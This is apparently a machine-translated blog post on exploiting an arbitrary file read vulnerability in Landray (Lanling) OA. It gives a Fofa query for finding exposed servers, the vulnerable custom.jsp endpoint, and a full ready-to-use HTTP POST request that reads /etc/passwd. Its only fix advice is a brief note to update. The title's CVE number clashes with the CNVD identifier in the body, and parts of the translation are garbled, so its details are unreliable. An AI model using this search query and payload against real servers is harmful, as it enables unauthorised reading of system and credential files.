CVE-2022-34924: Lanling OA foreground arbitrary file reading vulnerability exploitation - Develop Paper

Recently, cnvd broke the vulnerability number: cnvd-2021-28277, and the initial disclosure date is 2021-04-15, Lanling OA has multiple vulnerabilities, which can be used by attackers to gain control of the server. Today, select a Lanling OA foreground arbitrary file reading vulnerability for analysis and use. Link:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277

Lanling profile: Lanling software, fully known as Shenzhen Lanling Software Co., Ltd., was established in Shenzhen Science and Technology Park in 2001. Lanling is a well-known platform in ChinaOAAs a service provider and a leading provider of knowledge management solutions in China, it is a national level enterprise specializing in the organization’s knowledge-based consulting, software R & D, implementation and technical servicesHigh tech enterpriseRecently, the Landray OA system was exposed to read arbitrary files.

1、 Vulnerability location

Fofa cyberspace engine, fofa syntax: app = “Landray OA system”

Open the test website login page:

The vulnerability path is xxxxx / sys / UI / extend / varkind / custom JSP, that is, custom In JSP, you need to use the post request method. The request parameter is “var = {” body “: {” file “:“ file:///etc/passwd “}}

Use the hackbar Firefox plug-in to modify the parameters for the post request, and open xxxxx / sys / UI / extend / varkind / custom JSP is displayed in the following screen

2、 Vulnerability verification

It can be seen that the high-risk vulnerability that the passwd information of the system file can be read arbitrarily by modifying the parameters in the file;

Or use burp test:

Vulnerability payload is

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA419896062AC4B6FE325FF08B8AF36E
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

var={“body”:{“file”:”file:///etc/passwd”}}

Repair suggestions:It is recommended to update the system to the latest version by using the system of Lanling OA. Appendix address:https://www.landray.com.cn/

Special statement:

Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and I will not bear any responsibility for this.

The author has the right to revise and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way. Do not use it illegally, for learning reference only